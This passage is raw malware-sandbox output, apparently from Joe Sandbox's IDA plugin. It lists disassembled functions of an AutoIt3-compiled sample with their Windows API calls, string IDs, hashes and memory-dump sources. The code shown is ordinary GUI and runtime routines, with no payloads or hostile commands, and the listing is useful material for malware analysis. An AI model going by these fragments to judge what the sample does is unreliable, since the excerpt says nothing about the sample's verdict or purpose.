                                                      • Instruction Fuzzy Hash: 3CA13B71108246AFD704EF55C885EABBBEDFFC9354F00491CF195871A2EB71A909CB92
                                                      APIs
                                                        • Part of subcall function 00600DB6: std::exception::exception.LIBCMT ref: 00600DEC
                                                        • Part of subcall function 00600DB6: __CxxThrowException@8.LIBCMT ref: 00600E01
                                                        • Part of subcall function 005E7DE1: _memmove.LIBCMT ref: 005E7E22
                                                        • Part of subcall function 005E7A51: _memmove.LIBCMT ref: 005E7AAB
                                                      • __swprintf.LIBCMT ref: 005F2ECD
                                                      Strings
                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 005F2D66
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                      • API String ID: 1943609520-557222456
                                                      • Opcode ID: 80f0c0e66c404828409c66e91ac6abfb5690c1d4ab08f4677443428213eb9e28
                                                      • Instruction ID: 60529342b37778a74c2caba907e4a82f9cbdd64fb6a0121b38c8e49fcfb03be9
                                                      • Opcode Fuzzy Hash: 80f0c0e66c404828409c66e91ac6abfb5690c1d4ab08f4677443428213eb9e28
                                                      • Instruction Fuzzy Hash: 0C917D711086569FC718EF24D889C7FBBA9FF85310F10491DFA859B2A1EA34ED44CB52
                                                      APIs
                                                        • Part of subcall function 005E4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005E4743,?,?,005E37AE,?), ref: 005E4770
                                                      • CoInitialize.OLE32(00000000), ref: 0064B9BB
                                                      • CoCreateInstance.OLE32(00672D6C,00000000,00000001,00672BDC,?), ref: 0064B9D4
                                                      • CoUninitialize.OLE32 ref: 0064B9F1
                                                        • Part of subcall function 005E9837: __itow.LIBCMT ref: 005E9862
                                                        • Part of subcall function 005E9837: __swprintf.LIBCMT ref: 005E98AC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                      • String ID: .lnk
                                                      • API String ID: 2126378814-24824748
                                                      • Opcode ID: 70dc5e801300a55bebbc3424a36bcfe475f2708cb5b01b803fa107021b774a61
                                                      • Instruction ID: c10d56e49f019ba1b8582116d39652dc5f10dbc6f8d6fa99624580ff767928d1
                                                      • Opcode Fuzzy Hash: 70dc5e801300a55bebbc3424a36bcfe475f2708cb5b01b803fa107021b774a61
                                                      • Instruction Fuzzy Hash: 3CA168756043469FCB04DF15C884D6ABBE6FF89314F148998F8999B3A2CB31EC46CB91
                                                      APIs
                                                      • OleSetContainedObject.OLE32(?,00000001), ref: 0063B4BE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ContainedObject
                                                      • String ID: AutoIt3GUI$Container$%g
                                                      • API String ID: 3565006973-565656749
                                                      • Opcode ID: c8774b21e2467d33076da37f3d49076fbcf2c84db234e95636c5cbd98b71be25
                                                      • Instruction ID: aa2e0569637630c4ed07f14543352153c0bc26dd0a9ec5962ab454777ddfbaaa
                                                      • Opcode Fuzzy Hash: c8774b21e2467d33076da37f3d49076fbcf2c84db234e95636c5cbd98b71be25
                                                      • Instruction Fuzzy Hash: A8913B70600601EFDB54DF64C884B6ABBEAFF49710F14956DEA4ACB791DB70E841CB90
                                                      APIs
                                                      • __startOneArgErrorHandling.LIBCMT ref: 006050AD
                                                        • Part of subcall function 006100F0: __87except.LIBCMT ref: 0061012B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ErrorHandling__87except__start
                                                      • String ID: pow
                                                      • API String ID: 2905807303-2276729525
                                                      • Opcode ID: e626585ce11599a63f832d7ec430bf80d74add43f9e8d0b48dffbec80fc67c7c
                                                      • Instruction ID: a6a6c368bf15ed8193c39a2b3999affa4f02eec329b74f4f292588c0062fee95
                                                      • Opcode Fuzzy Hash: e626585ce11599a63f832d7ec430bf80d74add43f9e8d0b48dffbec80fc67c7c
                                                      • Instruction Fuzzy Hash: 5C515C3194860196EF1A7754CC023EF2BD7DB41700F288D59E4D7863D9EE788DD49E86
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: 3c_$__
                                                      • API String ID: 4104443479-43384800
                                                      • Opcode ID: 42b4a4a4a35bd0fcc149f55b5d325497948023fe08573b621a7d9935b3c4f233
                                                      • Instruction ID: 411f0e9c85f23e49379757552464e1aeaf0b38ef12af996a6be67dc4ddad69a2
                                                      • Opcode Fuzzy Hash: 42b4a4a4a35bd0fcc149f55b5d325497948023fe08573b621a7d9935b3c4f233
                                                      • Instruction Fuzzy Hash: 54517B70A01A199FCB64CF68D880AAEBBF2FF44304F148529E95AE7350EB31A955CF51
                                                      APIs
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0066F910,00000000,?,?,?,?), ref: 006679DF
                                                      • GetWindowLongW.USER32 ref: 006679FC
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00667A0C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Window$Long
                                                      • String ID: SysTreeView32
                                                      • API String ID: 847901565-1698111956
                                                      • Opcode ID: 276d2a0b60730e54de450799683f568a018ead647656bfea27f16caf25c7a5f5
                                                      • Instruction ID: 5730ad91d64cf36c9238d234e8897fc2b9b75908eb9f2dec792ff4c21c3e8439
                                                      • Opcode Fuzzy Hash: 276d2a0b60730e54de450799683f568a018ead647656bfea27f16caf25c7a5f5
                                                      • Instruction Fuzzy Hash: EA31D031204206AFDB119F78DC45BEA7BAAFB49328F245725F875A22E0D730ED518B50
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00667461
                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00667475
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00667499
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window
                                                      • String ID: SysMonthCal32
                                                      • API String ID: 2326795674-1439706946
                                                      • Opcode ID: a8bf208c0ac1e928d7b9c86aa1f63e8e0791af1981a1418b830bffa2aa7ea191
                                                      • Instruction ID: 462e44c75142b7fc2133a088e5741d110c6592a09ee248027b8b09e27dccd3fc
                                                      • Opcode Fuzzy Hash: a8bf208c0ac1e928d7b9c86aa1f63e8e0791af1981a1418b830bffa2aa7ea191
                                                      • Instruction Fuzzy Hash: 8E21BF32500218BBDF11CF64CC46FEA3BAAEB48724F110214FE15AB190DAB5AC91DBA0
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00666D3B
                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00666D4B
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00666D70
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$MoveWindow
                                                      • String ID: Listbox
                                                      • API String ID: 3315199576-2633736733
                                                      • Opcode ID: 510154e40cba2c3d72083b99f73b6b857d8c4abe44951b3a1c3465033ff0dd7c
                                                      • Instruction ID: 626b06683ffc7cd8ba57af35eb5abba8025baf4b406d9435508af6a6dd5b3769
                                                      • Opcode Fuzzy Hash: 510154e40cba2c3d72083b99f73b6b857d8c4abe44951b3a1c3465033ff0dd7c
                                                      • Instruction Fuzzy Hash: E3219232600118BFDF118F54EC45EEB3BBBEF89750F018128F9459B2A0C671AC518BA0
                                                      APIs
                                                      • __snwprintf.LIBCMT ref: 00653A66
                                                        • Part of subcall function 005E7DE1: _memmove.LIBCMT ref: 005E7E22
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: __snwprintf_memmove
                                                      • String ID: , $$AUTOITCALLVARIABLE%d$%g
                                                      • API String ID: 3506404897-54593619
                                                      • Opcode ID: a4027c09ee040ff03cb2257bae21d16c0828dde6576b79a74afc7e3fc9d87ecd
                                                      • Instruction ID: 8f169f03e62019ed6f9de91d98f7a8ec429d49f8b750dc9d23b3a3dbffd5dff6
                                                      • Opcode Fuzzy Hash: a4027c09ee040ff03cb2257bae21d16c0828dde6576b79a74afc7e3fc9d87ecd
                                                      • Instruction Fuzzy Hash: 4821A730A0021AAFCF14EF65CC85EAE7BBAFF85740F104454F949A7281DB30EA45CB65
                                                      APIs
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00638C6D
                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00638C84
                                                      • SendMessageW.USER32(?,0000000D,?,00000000), ref: 00638CBC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: @U=u
                                                      • API String ID: 3850602802-2594219639
                                                      • Opcode ID: 8069cd72a896338bcb27f03221fba5715add8fa5220327c159e789a6d1a7af23
                                                      • Instruction ID: 4e5305221ed312937a9a53e71b9068a08f086475bc96366410e29e8f69cb2e53
                                                      • Opcode Fuzzy Hash: 8069cd72a896338bcb27f03221fba5715add8fa5220327c159e789a6d1a7af23
                                                      • Instruction Fuzzy Hash: B821A132601219BFDB14DBA8D841DEFB7FEEF44350F10145AF505E32A0DA71AD448BA4
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00667772
                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00667787
                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00667794
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: msctls_trackbar32
                                                      • API String ID: 3850602802-1010561917
                                                      • Opcode ID: cf863c49a0e91038d84f0ed6167d84f119750ba56f01a1a9031e9a01c72a2b84
                                                      • Instruction ID: 6034aa78d3122c96ba343e000a36f3d9d599056c56a74b5bf4da11529d04d7df
                                                      • Opcode Fuzzy Hash: cf863c49a0e91038d84f0ed6167d84f119750ba56f01a1a9031e9a01c72a2b84
                                                      • Instruction Fuzzy Hash: 89110A72244209BFEF145F65CC05FD77B6EEF89B58F11411CF641A6190D672E851DB20
                                                      APIs
                                                      • GetWindowTextLengthW.USER32(00000000), ref: 006669A2
                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 006669B1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: LengthMessageSendTextWindow
                                                      • String ID: @U=u$edit
                                                      • API String ID: 2978978980-590756393
                                                      • Opcode ID: b7864b27f687b8c6afa6f6f2660c2b15d5ca3f97edef44c6ffbac8145899c6a2
                                                      • Instruction ID: 6b59e63a95c06de0f12c062fb7acfecea967016092efc27ed0300d5f23525922
                                                      • Opcode Fuzzy Hash: b7864b27f687b8c6afa6f6f2660c2b15d5ca3f97edef44c6ffbac8145899c6a2
                                                      • Instruction Fuzzy Hash: A2118F71500106ABEB109F74EC44AEB3B6BEB05374F504724FDA5A72E0C771EC519B60
                                                      APIs
                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,005E3C14,006A52F8,?,?,?), ref: 005F096E
                                                        • Part of subcall function 005E7BCC: _memmove.LIBCMT ref: 005E7C06
                                                      • _wcscat.LIBCMT ref: 00624CB7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: FullNamePath_memmove_wcscat
                                                      • String ID: `N$Sj
                                                      • API String ID: 257928180-2449741542
                                                      • Opcode ID: 269e4b7e308abbacb6606f9837b015a79dd839c2ef15f46a0100477c5466f8bd
                                                      • Instruction ID: 0ec532aae9565dc3a3353caa2c0dcc9edf32a3f5e30fa30845997f81fef11933
                                                      • Opcode Fuzzy Hash: 269e4b7e308abbacb6606f9837b015a79dd839c2ef15f46a0100477c5466f8bd
                                                      • Instruction Fuzzy Hash: D211E93190021EAACB40FB64CD05EDD7BE9BF48350B0454A5BA85D32C2FAF0AA844B10
                                                      APIs
                                                        • Part of subcall function 005E7DE1: _memmove.LIBCMT ref: 005E7E22
                                                        • Part of subcall function 0063AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0063AABC
                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00638E73
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_memmove
                                                      • String ID: @U=u$ComboBox$ListBox
                                                      • API String ID: 372448540-2258501812
                                                      • Opcode ID: 0e3b2e08c8a6cdd6901ae2d5424d996994525fc66d2d3942c36b0de3bb5a1b08
                                                      • Instruction ID: 0261cc3a8e7663d405643bcca7f5e6500a2b1c511ef9e2ab0df19f51bc10c9df
                                                      • Opcode Fuzzy Hash: 0e3b2e08c8a6cdd6901ae2d5424d996994525fc66d2d3942c36b0de3bb5a1b08
                                                      • Instruction Fuzzy Hash: F901B571A05219AB8F18EBA4CD558FE776AFF45320F140619F875572E2EE315808D690
                                                      APIs
                                                        • Part of subcall function 005E7DE1: _memmove.LIBCMT ref: 005E7E22
                                                        • Part of subcall function 0063AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0063AABC
                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00638D6B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_memmove
                                                      • String ID: @U=u$ComboBox$ListBox
                                                      • API String ID: 372448540-2258501812
                                                      • Opcode ID: 057f4dcb76fa646c297db2ce976ee5e872090785ae77bf01a7e4abe174b36600
                                                      • Instruction ID: 56d78a333dcc2111036e9a15cd1b55789c4bd5b3d94fe0353e455534fd7b1e01
                                                      • Opcode Fuzzy Hash: 057f4dcb76fa646c297db2ce976ee5e872090785ae77bf01a7e4abe174b36600
                                                      • Instruction Fuzzy Hash: D901D471A4520DABCF19EBE1CE56AFE77AADF15300F100029B845632E2DE215E08D2B1
                                                      APIs
                                                        • Part of subcall function 005E7DE1: _memmove.LIBCMT ref: 005E7E22
                                                        • Part of subcall function 0063AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0063AABC
                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00638DEE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_memmove
                                                      • String ID: @U=u$ComboBox$ListBox
                                                      • API String ID: 372448540-2258501812
                                                      • Opcode ID: fcd896bdbb5beae2ccc9733f350d6ba2fccbd5ed8d06bb85a419201b1fff4545
                                                      • Instruction ID: 9bd41adc19c98ed4e00f1231731c2c931390219fb98d39fcb9fed0f26306d4bc
                                                      • Opcode Fuzzy Hash: fcd896bdbb5beae2ccc9733f350d6ba2fccbd5ed8d06bb85a419201b1fff4545
                                                      • Instruction Fuzzy Hash: 4801A771A45209BBDF15EBA5CA46AFE77AEDF15300F100019B845A3292DE215E09E2B5
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: __calloc_crt
                                                      • String ID: i$@Bj
                                                      • API String ID: 3494438863-3936459638
                                                      • Opcode ID: 676f1706bab06559ff09ad4fcc6f2f5e9eca8376a91787e188e21e87541ff02b
                                                      • Instruction ID: 601c9de11bee937d033ed701ede808bdcd2cc550a5f37ef4cd1941726e3a7831
                                                      • Opcode Fuzzy Hash: 676f1706bab06559ff09ad4fcc6f2f5e9eca8376a91787e188e21e87541ff02b
                                                      • Instruction Fuzzy Hash: 85F044B12846129FE76CEF58FC51B9737A7E711730B50041AF106CF6D0EB7099618AD4
                                                      APIs
                                                      • GetForegroundWindow.USER32(?,006A57B0,0066D809,000000FC,?,00000000,00000000,?,?,?,0061B969,?,?,?,?,?), ref: 0066ACD1
                                                      • GetFocus.USER32 ref: 0066ACD9
                                                        • Part of subcall function 005E2612: GetWindowLongW.USER32(?,000000EB), ref: 005E2623
